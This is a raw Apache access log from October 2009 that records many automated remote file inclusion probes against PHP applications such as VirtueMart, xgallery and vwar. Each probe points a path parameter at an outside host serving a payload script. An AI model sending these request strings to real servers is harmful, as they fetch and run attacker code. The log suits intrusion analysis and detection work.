147.46.116.207 - - [18/Oct/2009:04:31:16 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
201.218.228.226 - - [18/Oct/2009:04:32:09 -0400] "GET /logs/access_log.Q109080200//include/postgres.php?inc_dir=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
65.38.18.81 - - [18/Oct/2009:04:32:30 -0400] "GET /logs/access_log.Q109071400//oneadmin/newspublish/include.php?path[docroot]=http://triton.100free.com/mic22? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:32:31 -0400] "GET /logs//oneadmin/newspublish/include.php?path[docroot]=http://triton.100free.com/mic22? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:32:35 -0400] "GET /logs/access_log.Q109063000//oneadmin/newspublish/include.php?path[docroot]=http://triton.100free.com/mic22? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:32:38 -0400] "GET /logs/access_log.Q109071400//oneadmin/newspublish/samplenewspublish.php?path[docroot]=http://triton.100free.com/mic22? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:32:38 -0400] "GET /logs//oneadmin/newspublish/samplenewspublish.php?path[docroot]=http://triton.100free.com/mic22? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:32:39 -0400] "GET /logs/access_log.Q109071400//oneadmin/newspublish/samplenewspublish.php?path[docroot]=http://triton.100free.com/mic22? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:32:39 -0400] "GET /logs//oneadmin/newspublish/samplenewspublish.php?path[docroot]=http://triton.100free.com/mic22? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
190.97.219.4 - - [18/Oct/2009:04:32:40 -0400] "GET //include/admin.lib.inc.php?site_path=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
190.97.219.4 - - [18/Oct/2009:04:32:40 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
190.97.219.4 - - [18/Oct/2009:04:32:40 -0400] "GET /logs/error_log.Q109070800%20//include/admin.lib.inc.php?site_path=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
65.38.18.81 - - [18/Oct/2009:04:32:42 -0400] "GET /logs/access_log.Q109071400//oneadmin/newspublish/include.php?path[docroot]=http://triton.100free.com/mic22? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:32:42 -0400] "GET /logs//oneadmin/newspublish/include.php?path[docroot]=http://triton.100free.com/mic22? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:32:43 -0400] "GET /logs/access_log.Q109063000//oneadmin/newspublish/samplenewspublish.php?path[docroot]=http://triton.100free.com/mic22? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:32:44 -0400] "GET /logs/access_log.Q109063000//oneadmin/newspublish/include.php?path[docroot]=http://triton.100free.com/mic22? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:32:45 -0400] "GET /logs/access_log.Q109063000//oneadmin/newspublish/samplenewspublish.php?path[docroot]=http://triton.100free.com/mic22? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
209.59.12.99 - - [18/Oct/2009:04:34:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.97.219.4 - - [18/Oct/2009:04:34:08 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
190.97.219.4 - - [18/Oct/2009:04:34:08 -0400] "GET /logs/access_log.Q109052500//include/admin.lib.inc.php?site_path=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
202.131.226.52 - - [18/Oct/2009:04:35:11 -0400] "GET /logs/access_log.Q109070300%20%20//modules/vwar/administrator/admin.php?vwar_root=http://iyu.fileave.com/id2.txt?????????? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
202.131.226.52 - - [18/Oct/2009:04:35:11 -0400] "GET //modules/vwar/administrator/admin.php?vwar_root=http://iyu.fileave.com/id2.txt?????????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.131.226.52 - - [18/Oct/2009:04:35:11 -0400] "GET /logs//modules/vwar/administrator/admin.php?vwar_root=http://iyu.fileave.com/id2.txt?????????? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
202.131.226.52 - - [18/Oct/2009:04:35:33 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/administrator/admin.php?vwar_root=http://iyu.fileave.com/id2.txt?????????? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
72.3.133.37 - - [18/Oct/2009:04:35:53 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.fresnodelapolvorosa.com/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.3.133.37 - - [18/Oct/2009:04:35:53 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.fresnodelapolvorosa.com/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
72.3.133.37 - - [18/Oct/2009:04:35:53 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.fresnodelapolvorosa.com/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
72.3.133.37 - - [18/Oct/2009:04:35:54 -0400] "GET /logs/access_log.Q109081300//admin/classes/TplLoad.php?full_path_to_public_program=http://www.fresnodelapolvorosa.com/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
82.193.15.3 - - [18/Oct/2009:04:35:56 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
82.193.15.3 - - [18/Oct/2009:04:36:01 -0400] "GET /logs/error_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
80.67.20.150 - - [18/Oct/2009:04:36:05 -0400] "GET /logs/access_log.Q109052400///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 227 "-" "libwww-perl/5.808"
80.67.20.150 - - [18/Oct/2009:04:36:05 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 200 453 "-" "libwww-perl/5.808"
80.67.20.150 - - [18/Oct/2009:04:36:05 -0400] "GET /logs/error_log.Q109052400///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 226 "-" "libwww-perl/5.808"
80.67.20.150 - - [18/Oct/2009:04:36:05 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 200 22328 "-" "libwww-perl/5.808"
95.211.14.134 - - [18/Oct/2009:04:36:10 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:04:36:10 -0400] "GET /logs/access_log.Q109072500//bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:04:36:10 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:04:36:10 -0400] "GET /logs/access_log.Q109072200//bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:04:36:10 -0400] "GET /logs/access_log.Q109072500//bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:04:36:10 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:04:36:10 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:04:36:10 -0400] "GET /logs/access_log.Q109072200//bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.65.65.67 - - [18/Oct/2009:04:36:35 -0400] "GET /logs/access_log.Q109062300/lostpasswd.php?env[include_prefix]=http://www.fresnodelapolvorosa.com/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.65.65.67 - - [18/Oct/2009:04:36:35 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.fresnodelapolvorosa.com/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
69.65.65.67 - - [18/Oct/2009:04:36:35 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.fresnodelapolvorosa.com/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
147.46.116.207 - - [18/Oct/2009:04:36:43 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
147.46.116.207 - - [18/Oct/2009:04:36:43 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
147.46.116.207 - - [18/Oct/2009:04:36:43 -0400] "GET /logs/access_log.Q109082000/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
110.45.147.248 - - [18/Oct/2009:04:37:14 -0400] "GET /logs/access_log.Q109090600%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
69.64.75.54 - - [18/Oct/2009:04:37:18 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.fresnodelapolvorosa.com/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
69.64.75.54 - - [18/Oct/2009:04:37:18 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.fresnodelapolvorosa.com/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
69.64.75.54 - - [18/Oct/2009:04:37:18 -0400] "GET /logs/access_log.Q109062300/lostpasswd.php?env[include_prefix]=http://www.fresnodelapolvorosa.com/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:04:38:16 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.29.70.51 - - [18/Oct/2009:04:38:19 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.fresnodelapolvorosa.com/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
72.29.70.51 - - [18/Oct/2009:04:38:19 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.fresnodelapolvorosa.com/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
72.29.70.51 - - [18/Oct/2009:04:38:19 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.fresnodelapolvorosa.com/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.29.70.51 - - [18/Oct/2009:04:38:20 -0400] "GET /logs/access_log.Q109081300//admin/classes/TplLoad.php?full_path_to_public_program=http://www.fresnodelapolvorosa.com/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:04:38:24 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:04:38:24 -0400] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.3.133.37 - - [18/Oct/2009:04:38:56 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.fresnodelapolvorosa.com/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
72.3.133.37 - - [18/Oct/2009:04:38:56 -0400] "GET /logs/access_log.Q109081300%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.fresnodelapolvorosa.com/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:04:39:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.147.248 - - [18/Oct/2009:04:39:18 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
110.45.147.248 - - [18/Oct/2009:04:39:18 -0400] "GET /logs/access_log.Q109052000/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
110.45.147.248 - - [18/Oct/2009:04:39:18 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
110.45.147.248 - - [18/Oct/2009:04:39:35 -0400] "GET /logs/access_log.Q109090700/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
187.4.48.90 - - [18/Oct/2009:04:39:36 -0400] "GET /index.php?pag=http://fffmatheus.justfree.com/safeof.txt??????? HTTP/1.1" 404 207 "-" "libwww-perl/5.813"
77.242.37.212 - - [18/Oct/2009:04:39:49 -0400] "GET /logs/error_log.Q109092300%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.29.70.51 - - [18/Oct/2009:04:39:59 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.fresnodelapolvorosa.com/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
72.29.70.51 - - [18/Oct/2009:04:39:59 -0400] "GET /logs/access_log.Q109081300%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.fresnodelapolvorosa.com/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
174.143.3.188 - - [18/Oct/2009:04:40:18 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
174.143.3.188 - - [18/Oct/2009:04:40:18 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
174.143.3.188 - - [18/Oct/2009:04:40:18 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
174.143.3.188 - - [18/Oct/2009:04:40:18 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
77.242.37.212 - - [18/Oct/2009:04:40:31 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:04:40:40 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:04:40:40 -0400] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:04:41:04 -0400] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:04:41:04 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:04:41:04 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
147.46.116.207 - - [18/Oct/2009:04:41:09 -0400] "GET /logs/access_log.Q109082000%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:04:41:23 -0400] "GET /logs/access_log.Q109072500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:04:41:28 -0400] "GET /logs/access_log.Q109072200%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:04:41:29 -0400] "GET /logs/access_log.Q109072500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
95.211.14.134 - - [18/Oct/2009:04:41:29 -0400] "GET /logs/access_log.Q109072200%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.miomatrimonio.com/editor/idxx.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
69.65.65.67 - - [18/Oct/2009:04:41:33 -0400] "GET /logs/access_log.Q109062300%20%20/lostpasswd.php?env[include_prefix]=http://www.fresnodelapolvorosa.com/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
189.43.142.10 - - [18/Oct/2009:04:41:33 -0400] "GET /logs/access_log.Q109060500/index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
77.242.37.212 - - [18/Oct/2009:04:41:50 -0400] "GET /logs/error_log.Q109092300%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:04:41:51 -0400] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:04:41:51 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:04:41:51 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:04:42:07 -0400] "GET /logs/error_log.Q109092300%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
147.46.116.207 - - [18/Oct/2009:04:42:08 -0400] "GET /logs/access_log.Q109100200%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
69.64.75.54 - - [18/Oct/2009:04:42:46 -0400] "GET /logs/access_log.Q109062300%20%20/lostpasswd.php?env[include_prefix]=http://www.fresnodelapolvorosa.com/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:04:42:59 -0400] "GET /logs/error_log.Q109092300%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
110.45.147.248 - - [18/Oct/2009:04:43:50 -0400] "GET /logs/access_log.Q109082000/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
110.45.147.248 - - [18/Oct/2009:04:43:50 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
110.45.147.248 - - [18/Oct/2009:04:43:50 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
110.45.147.248 - - [18/Oct/2009:04:43:50 -0400] "GET /logs/access_log.Q109080800/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
209.59.12.99 - - [18/Oct/2009:04:44:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.35.150.139 - - [18/Oct/2009:04:44:09 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:04:44:09 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:04:44:10 -0400] "GET /logs/access_log.Q109051500//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:04:44:14 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:04:44:14 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:04:44:14 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:04:44:15 -0400] "GET /logs/access_log.Q109051500//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:04:44:15 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:04:44:15 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:04:44:15 -0400] "GET /logs/access_log.Q109081400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:04:44:21 -0400] "GET /logs/access_log.Q109081400%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:04:44:23 -0400] "GET /logs/access_log.Q109081400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:04:44:25 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:04:44:25 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:04:44:25 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:04:44:33 -0400] "GET /logs/access_log.Q109081400%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:04:44:48 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:04:44:48 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:04:44:48 -0400] "GET /logs/access_log.Q109051500//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
